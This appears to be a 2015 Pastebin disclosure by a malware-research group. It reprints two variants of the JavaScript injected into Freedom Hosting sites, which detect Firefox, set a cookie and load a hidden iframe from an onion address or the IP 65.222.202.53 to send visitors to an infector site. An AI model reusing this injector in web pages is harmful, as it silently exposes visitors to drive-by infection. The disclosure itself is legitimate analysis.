Googleinurl

Freedom Hosting FBI IFRAME Redirector Malware Script

Jan 15th, 2015
1,102
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie!
  2. # This is the malicious Javascript set codes injected to the Freedom Hosting site
  3. # It contents the IFRAMER Malware method to redirect the victim to infector site, in url:
  4. # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0
  5. #
  6. # Original copy at: www.twitlonger.com/show/n_1rlo0uu
  7. # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!!
  8. # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER.
  9. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
  10. # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
  11. # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
  12. # Ref: http://www.twitlonger.com/show/n_1rlo0uu
  13. # Ref: http://pastebin.com/bu2Ya0n6
  14. # Ref: http://pastebin.com/pmGEj9bV
  15.  
  16. // Case 1
  17.  
  18.     function createCookie(name,value,minutes) {
  19.             if (minutes) {
  20.                     var date = new Date();
  21.                     date.setTime(date.getTime()+(minutes*60*1000));
  22.                     var expires = "; expires="+date.toGMTString();
  23.             }
  24.             else var expires = "";
  25.             document.cookie = name+"="+value+expires+"; path=/";
  26.     }
  27.      
  28.     function readCookie(name) {
  29.         var nameEQ = name + "=";
  30.         var ca = document.cookie.split(';');
  31.         for(var i=0;i < ca.length;i++) {
  32.             var c = ca[i];
  33.             while (c.charAt(0)==' ') c = c.substring(1,c.length);
  34.             if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  35.         }
  36.         return null;
  37.     }
  38.      
  39.     function isFF() {
  40.         return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  41.     }
  42.      
  43.     function updatify() {
  44.         var iframe = document.createElement('iframe');
  45.         iframe.style.display = "inline";
  46.         iframe.frameBorder = "0";
  47.         iframe.scrolling = "no";
  48.         iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  49.         iframe.height = "5";
  50.         iframe.width = "*";
  51.         document.body.appendChild(iframe);
  52.     }
  53.      
  54.     function format_quick() {
  55.         if ( ! readCookie("n_serv") ) {
  56.             createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
  57.             updatify();
  58.         }
  59.     }
  60.      
  61.     function isReady()
  62.     {
  63.         if ( document.readyState === "interactive" || document.readyState === "complete" ) {
  64.      
  65.             if ( isFF() ) {
  66.                 format_quick();
  67.             }
  68.         }
  69.         else
  70.         {
  71.             setTimeout(isReady, 250);
  72.         }
  73.     }
  74.     setTimeout(isReady, 250);
  75.  
  76.  
  77. // Case 2
  78.  
  79. function createCookie(name, value, minutes) {
  80.     if (minutes) {
  81.         var date = new Date();
  82.         date.setTime(date.getTime() + (minutes * 60 * 1000));
  83.         var expires = "; expires=" + date.toGMTString();
  84.     } else var expires = "";
  85.     document.cookie = name + "=" + value + expires + "; path=/";
  86. }
  87.  
  88. function readCookie(name) {
  89.     var nameEQ = name + "=";
  90.     var ca = document.cookie.split(';');
  91.     for (var i = 0; i < ca.length; i++) {
  92.         var c = ca[i];
  93.         while (c.charAt(0) == ' ') c = c.substring(1, c.length);
  94.         if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  95.     }
  96.     return null;
  97. }
  98.  
  99. function isFF() {
  100.     return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
  101. }
  102.  
  103. function updatify() {
  104.     var iframe = document.createElement('iframe');
  105.     iframe.style.display = "inline";
  106.     iframe.frameBorder = "0";
  107.     iframe.scrolling = "no";
  108.     iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; <== (1) 1ST CALLBACK SELF EXPLANATORY
  109.     iframe.height = "5";
  110.     iframe.width = "*";
  111.     document.body.appendChild(iframe);
  112. }
  113.  
  114. function freedomhost() {
  115.     if (!readCookie("n_serv")) {
  116.         createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
  117.         updatify();
  118.     }
  119. }
  120.  
  121. function isReady() {
  122.     if (document.readyState === "interactive" || document.readyState === "complete") {
  123.         if (isFF()) {
  124.             //window.alert(window.location + "Firefox Detected.")
  125.             freedomhost();
  126.         }
  127.     } else {
  128.         setTimeout(isReady, 250);
  129.     }
  130. }
  131. setTimeout(isReady, 250);
  132.  
  133. // Noted, same method,
  134. // second script is w/IP info callback, contacting remote host as per marked (1)
  135.  
  136.   IP Address: 65.222.202.53
  137.   City: Triadelphia
  138.   State or Region: West Virginia
  139.   Country: United States
  140.   ISP: Verizon Business
  141.   Latitude & Longitude: 40.0900-80.6220
  142.   Domain: verizonbusiness.com
  143.   ZIP Code: 26059
  144.  
  145. ---
  146. #MalwareMustDie! @unixfreaxjp
RAW Paste Data